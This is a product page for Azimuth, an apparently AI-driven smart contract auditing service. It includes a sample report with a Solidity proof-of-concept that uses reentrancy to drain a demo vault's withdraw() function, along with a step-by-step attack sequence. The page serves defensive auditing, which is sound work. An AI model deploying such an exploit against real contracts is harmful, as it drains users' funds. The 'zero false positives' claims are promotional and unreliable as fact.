Automated Security Analysis

AI Agents That Actively Attack Your Smart Contracts

Running against forked mainnet environments with real transaction execution, Azimuth probes every function, chains multi-step attacks, and proves exploits end-to-end. If Azimuth reports a vulnerability, it was actually exploited — not just theoretically possible.

How It Works

Azimuth — Automated Security Analysis

Azimuth deploys AI agents — powered by Lodestar, our reinforcement learning engine — that actively attack your smart contracts. Running against forked mainnet environments with real transaction execution, Azimuth probes every function, chains multi-step attacks, and proves exploits end-to-end. If Azimuth reports a vulnerability, it was actually exploited — not just theoretically possible.

AI agents Zero false positives Working PoC for every finding CI/CD integration

app.testmachine.ai/azimuth/report/primevault

Security Analysis — testmachine-ai/PrimeVault

✓ Completed

Investigated

Confirmed

False Positives

Analysis Time

—

100% signal · 0 false positives

4.8M tokens · $0.05 total cost

Findings Critical 1 Low 1

Critical Reentrancy in withdraw() enables fund drainage

✓ Confirmed

The withdraw() function sends ETH to the caller before updating internal accounting state. An attacker can deploy a malicious contract that re-enters withdraw() during the ETH transfer, draining the vault in a single transaction.

Attack Sequence

1 Attacker deposits minimum stake into PrimeVault

2 Attacker calls withdraw() from malicious contract

3 PrimeVault sends ETH via call{value:}

4 Attacker's receive() re-enters withdraw()

5 State not yet updated — full balance available again

6 Loop repeats until vault is drained

Proof of Concept

// SPDX-License-Identifier: MIT pragma solidity ^0.8.19; import "./PrimeVault.sol"; contract ReentrancyExploit { PrimeVault public vault; uint256 public attackCount; constructor(address _vault) {
        vault = PrimeVault(_vault);
    } function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw();
    } receive() external payable { if (attackCount < 10) {
            attackCount++;
            vault.withdraw();
        }
    }
}

Low Arithmetic overflow in pendingReward calculation

✓ Confirmed

The pendingReward() function can overflow when computing accumulated rewards for accounts with very large staking durations combined with high reward rates. Results in denial of service for affected accounts — rewards become unclaimable.

Run Azimuth Analysis →

Process

Submit. Fork. Attack. Report.

Submit

Point Azimuth at any contract address or GitHub repo. Works with deployed contracts or pre-deployment code.

Fork & Attack

Azimuth forks live mainnet state and deploys RL agents powered by Lodestar. Agents chain multi-step attacks, probing every function and state transition.

Report

Every finding includes a working proof-of-concept exploit. Zero false positives — if Azimuth reports it, it was actually exploited.

Vulnerability Coverage

Behavioral vulnerabilities that static analysis misses

Azimuth discovers exploit paths through execution, not pattern matching. These vulnerability classes require understanding contract state across sequences of transactions — exactly what LLMs and static analyzers cannot do.

↻

Reentrancy

Detects recursive call exploits across single and cross-function patterns, including read-only reentrancy.

⇝

Flash Loan Attacks

Discovers multi-step flash loan sequences that manipulate prices, drain pools, or exploit composability gaps.

⊕

Access Control

Finds privilege escalation paths, unprotected admin functions, and misconfigured role hierarchies.

⌖

Oracle Manipulation

Identifies price feed exploits, TWAP manipulation windows, and stale oracle dependencies.

Economic Logic Flaws

Uncovers broken incentive structures, sandwich attack vectors, and arbitrage-exploitable pricing curves.

✶

Governance Attacks

Tests voting manipulation, quorum exploitation, timelock bypasses, and proposal hijacking scenarios.

Comparison

Minutes, not months

Azimuth is not a replacement for human auditors — it is a continuous security layer that catches what point-in-time audits cannot.

Traditional Audit

Azimuth

Time to results

4–8 weeks

Minutes

Cost

$50K–$500K

Fraction of traditional audit cost

False positives

Common — findings require manual triage

Zero — every finding is a proven exploit

Output

PDF report with recommendations

Working PoC exploit code for every finding

Coverage

Point-in-time snapshot

Continuous re-analysis as contracts change

Scalability

One project per engagement

Thousands of contracts per day

Integration

Security at every stage

From first commit to production monitoring, Azimuth fits into your existing workflow.

Pre-Deployment

Run Azimuth before deploying to mainnet. Catch exploitable vulnerabilities while fixes are still cheap.

CI/CD Pipeline

Integrate via GitHub Actions or CLI. Every pull request automatically tested for security regressions.

Continuous Monitoring

Post-deployment, Azimuth continuously re-analyzes as proxy contracts upgrade and external dependencies change.

Due Diligence

Exchanges, VCs, and protocols use Azimuth to evaluate token and protocol risk before listing or investing.

The Engine

Powered by Lodestar

Lodestar is TestMachine's proprietary reinforcement learning engine. Unlike LLMs that pattern-match against known vulnerability templates, Lodestar agents learn by doing — interacting with smart contracts through thousands of transaction sequences, receiving reward signals when exploits succeed, and adapting their strategies to each contract's unique logic.

Learns from every interaction — agents improve as they explore more contracts

State-aware — tracks the full contract state across multi-step attack sequences

Novel vulnerability discovery — finds exploits that have never been documented

Adversarial by design — attacks contracts the way a real attacker would

Coverage

Every major EVM chain

One engine. Full coverage. Every chain analyzed with the same depth and rigor.

Ethereum

Base

Arbitrum

Optimism

Polygon

Avalanche

BNB Chain

Secure your protocol today

RL-powered security analysis with zero false positives. Every finding includes a working proof-of-concept exploit.

Run Azimuth Analysis